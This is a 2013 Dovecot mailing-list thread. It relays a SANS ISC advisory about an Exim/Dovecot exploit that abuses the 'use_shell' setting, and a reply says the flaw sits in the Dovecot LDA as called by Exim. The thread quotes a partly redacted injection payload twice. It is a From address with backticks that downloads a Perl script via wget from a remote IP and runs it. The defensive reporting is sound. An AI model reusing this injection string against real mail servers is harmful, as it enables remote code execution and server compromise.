dovecot - Jun 2013 - from ISC: Exim/Dovecot exploit making the rounds

One of our readers wrote in to let us know that he had received an attempted 
Exim/Dovecot exploit attempt against his email server.  The exploit partially 
looked like this:

From: 
x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com

(Obviously edited for your safety, and I didn't post the whole thing.)

This is an exploit against Dovecot that is using the feature
"use_shell" against
itself.  This feature, unfortunately, is found in the example wiki on
Dovecot's
website, and also in their example configuration.  We'd caution anyone that
is
using Dovecot to take a look at their configuration and make use they aren't
using the "use_shell" parameter.  Or if you are, make darn sure you
know what
you are doing, and how to defend yourself.


https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962




Ciao,
luigi

-- 
/
+--[Luigi Rosa]--
\

The generation of random numbers is too important to be left to chance.

Actually, it is an exploit against dovecot LDA, introduced, and caused
by, exim.



On Sun, 2013-06-09 at 09:58 +0200, Luigi Rosa wrote:
> One of our readers wrote in to let us know that he had received an
attempted
> Exim/Dovecot exploit attempt against his email server.  The exploit
partially
> looked like this:
> 
> From: 
>
x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
> 
> (Obviously edited for your safety, and I didn't post the whole thing.)
> 
> This is an exploit against Dovecot that is using the feature
"use_shell" against
> itself.  This feature, unfortunately, is found in the example wiki on
Dovecot's
> website, and also in their example configuration.  We'd caution anyone
that is
> using Dovecot to take a look at their configuration and make use they
aren't
> using the "use_shell" parameter.  Or if you are, make darn sure
you know what
> you are doing, and how to defend yourself.
> 
> 
> https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962
> 
> 
> 
> 
> Ciao,
> luigi
> 

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 490 bytes
Desc: This is a digitally signed message part
URL:
<http://dovecot.org/pipermail/dovecot/attachments/20130609/fc3f0d3c/attachment.bin>